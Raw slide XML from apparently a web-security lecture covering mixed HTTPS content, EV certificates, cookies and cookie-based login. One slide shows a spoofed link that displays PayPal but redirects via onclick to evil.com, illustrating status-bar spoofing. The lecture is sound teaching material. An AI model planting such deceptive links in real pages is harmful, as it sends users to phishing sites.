            <a:chExt cx="2139" cy="1097"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1400844" name="Picture 12" descr="unspecifiedSecurityflaw"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:srcRect l="42221" t="47212"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3169" y="1104"/>
              <a:ext cx="2139" cy="909"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1400848" name="Text Box 16"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3638" y="916"/>
              <a:ext cx="920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silly dialogs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1412875" y="2590800"/>
            <a:ext cx="7350125" cy="46355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1295400" y="4876800"/>
            <a:ext cx="7239000" cy="4572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r>
              <a:rPr lang="en-US" sz="4000"/>
              <a:t>Mixed content and network attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145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5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>banks: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>after </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>login all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>content </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>over </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTTPS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Developer error:     Somewhere on bank site write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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>://www.site.com/script.js&gt; &lt;/script&gt;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Active network attacker can now hijack any session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buNone/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Better way to include content</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>   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=//www.site.com/script.js&gt; &lt;/script&gt;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served </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>over the same protocol as embedding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Icon 2.0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1396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8001000" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" u="sng" dirty="0">
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Extended validation (EV) certs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:ea typeface="굴림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</p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1396740" name="Picture 2" descr="D:\HOME\abarth\svn\papers\https\screenshots\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75" y="2438400"/>
            <a:ext cx="7515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9674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3511550"/>
          <a:ext cx="73914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5" name="Image" r:id="rId4" imgW="8101587" imgH="1079365" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Image" r:id="rId4" imgW="8101587" imgH="107936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11550"/>
                        <a:ext cx="73914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6745" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="774700" y="5062538"/>
            <a:ext cx="7573963" cy="15525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 Prominent security indicator for  EV  certificates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 note:  EV site loading content from non-EV site does</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>	   not trigger mixed content warning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Finally:   the status Bar</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138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  <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Trivially </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>spoofable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="80000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1">
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>=“http://www.paypal.com/”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 dirty="0">
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>	        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>this.href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> = ‘http://www.evil.com/’;”&gt;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400" dirty="0">
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>     PayPal&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:ea typeface="굴림" pitchFamily="34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200" y="1905000"/>
            <a:ext cx="6477000" cy="762000"/>
            <a:chOff x="528" y="1200"/>
            <a:chExt cx="4080" cy="480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1384456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 t="87500" r="36719" b="4167"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="720" y="1200"/>
              <a:ext cx="3888" cy="38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</p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1384457" name="AutoShape 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="528" y="1344"/>
              <a:ext cx="2688" cy="336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Cookies:   client state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09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/>
          <a:p>
            <a:fld id="{21B46397-9ABA-41D2-BBEA-0C987D291BDA}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>56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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1295400"/>
            <a:ext cx="2157413" cy="5334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/>
              <a:t>Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13731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001000" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Used to store state on user’s machine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1373189" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="19970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90" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1547813" y="2097088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373191" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="28352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92" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="30638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193" name="Freeform 9"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2190750" y="2830513"/>
            <a:ext cx="400050" cy="38576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194" name="AutoShape 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6172200" y="19208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373195" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="23780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196" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3626778" y="1905000"/>
            <a:ext cx="1088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>
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>POST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1373197" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="26066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198" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="2667000"/>
            <a:ext cx="48006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domain = (who can read)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expires = (when expires)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secure = (only over SSL)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1373199" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="5029200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200" name="AutoShape 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1547813" y="5129213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373201" name="AutoShape 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="5867400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202" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="6096000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3203" name="Freeform 19"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2190750" y="5862638"/>
            <a:ext cx="400050" cy="38576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204" name="AutoShape 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6172200" y="4953000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373205" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="528002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73206" name="Text Box 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2895600" y="5334000"/>
            <a:ext cx="2924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>
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>POST  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…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solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cookie:  NAME = VALUE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1373207" name="Text Box 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3521075" y="6407150"/>
            <a:ext cx="519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/>
              <a:t>HTTP is stateless protocol; cookies add state</a:t>
            </a:r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373208" name="Line 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="47244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130300" y="3657600"/>
            <a:ext cx="2984500" cy="714375"/>
            <a:chOff x="712" y="2304"/>
            <a:chExt cx="1880" cy="450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1373210" name="Text Box 26"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="712" y="2304"/>
              <a:ext cx="1331" cy="45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If expires=NULL:</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>this session only</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1373211" name="Line 27"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2016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99" grpId="0" animBg="1"/>
      <p:bldP spid="1373200" grpId="0" animBg="1"/>
      <p:bldP spid="1373201" grpId="0" animBg="1"/>
      <p:bldP spid="1373202" grpId="0" animBg="1"/>
      <p:bldP spid="1373203" grpId="0" animBg="1"/>
      <p:bldP spid="1373204" grpId="0" animBg="1"/>
      <p:bldP spid="1373205" grpId="0" animBg="1"/>
      <p:bldP spid="1373206" grpId="0"/>
      <p:bldP spid="1373207" grpId="0"/>
      <p:bldP spid="137320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9" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8458200" y="1143000"/>
            <a:ext cx="533400" cy="9906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6" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="1143000"/>
            <a:ext cx="533400" cy="9906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authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1323012" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="2133600"/>
            <a:ext cx="1219200" cy="434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3" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4267200" y="2133600"/>
            <a:ext cx="1219200" cy="434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3014" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7696200" y="2133600"/>
            <a:ext cx="1219200" cy="434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23015" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1736725"/>
            <a:ext cx="109061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Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1323017" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4154488" y="1752600"/>
            <a:ext cx="148431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Web Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1323018" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7593013" y="1752600"/>
            <a:ext cx="147478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Auth server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00200" y="2222500"/>
            <a:ext cx="2667000" cy="701675"/>
            <a:chOff x="1008" y="1400"/>
            <a:chExt cx="1680" cy="442"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323020" name="Line 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="1008" y="163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21" name="Text Box 13"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1164" y="1400"/>
              <a:ext cx="1328" cy="44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POST login.cgi</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>Username &amp; pwd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486400" y="2527300"/>
            <a:ext cx="2106613" cy="396875"/>
            <a:chOff x="3456" y="1592"/>
            <a:chExt cx="1327" cy="250"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323022" name="Line 14"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3456" y="1842"/>
              <a:ext cx="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23" name="Text Box 15"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3552" y="1592"/>
              <a:ext cx="1031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Validate user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486400" y="3260725"/>
            <a:ext cx="3429000" cy="717550"/>
            <a:chOff x="3456" y="2054"/>
            <a:chExt cx="2160" cy="452"/>
          </a:xfrm>
        </p:grpSpPr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456" y="2054"/>
              <a:ext cx="1392" cy="250"/>
              <a:chOff x="3456" y="2054"/>
              <a:chExt cx="1392" cy="250"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1323024" name="Line 16"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="3456" y="2256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3025" name="Text Box 17"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3763" y="2054"/>
                <a:ext cx="850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9900"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>auth=val</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323027" name="Text Box 19"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4877" y="2256"/>
              <a:ext cx="739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Store val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600200" y="3336925"/>
            <a:ext cx="2709863" cy="396875"/>
            <a:chOff x="1008" y="2102"/>
            <a:chExt cx="1707" cy="250"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323028" name="Line 20"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="1008" y="2304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29" name="Text Box 21"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1098" y="2102"/>
              <a:ext cx="1617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Set-cookie: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" b="1">
                  <a:solidFill>
                    <a:srgbClr val="009900"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>auth=val</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1323030" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr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600200" y="4403725"/>
            <a:ext cx="2667000" cy="701675"/>
            <a:chOff x="1008" y="2774"/>
            <a:chExt cx="1680" cy="442"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323031" name="Line 23"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1008" y="2976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2" name="Text Box 24"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1064" y="2774"/>
              <a:ext cx="1480" cy="44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GET restricted.html</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>Cookie:  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:solidFill>
                    <a:srgbClr val="009900"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>auth=val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486400" y="4602163"/>
            <a:ext cx="2209800" cy="701675"/>
            <a:chOff x="3456" y="2899"/>
            <a:chExt cx="1392" cy="442"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323033" name="Line 25"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3456" y="3120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4" name="Text Box 26"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3552" y="2899"/>
              <a:ext cx="1140" cy="44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restricted.html</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>auth=val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486400" y="5562600"/>
            <a:ext cx="2209800" cy="396875"/>
            <a:chOff x="3456" y="3504"/>
            <a:chExt cx="1392" cy="250"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323035" name="Line 27"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="3456" y="3552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6" name="Text Box 28"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3832" y="3504"/>
              <a:ext cx="668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YES/NO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1689100" y="5562600"/>
            <a:ext cx="2465388" cy="701675"/>
            <a:chOff x="1064" y="3504"/>
            <a:chExt cx="1553" cy="442"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323037" name="Line 29"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="1064" y="3744"/>
              <a:ext cx="15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3038" name="Text Box 30"/>
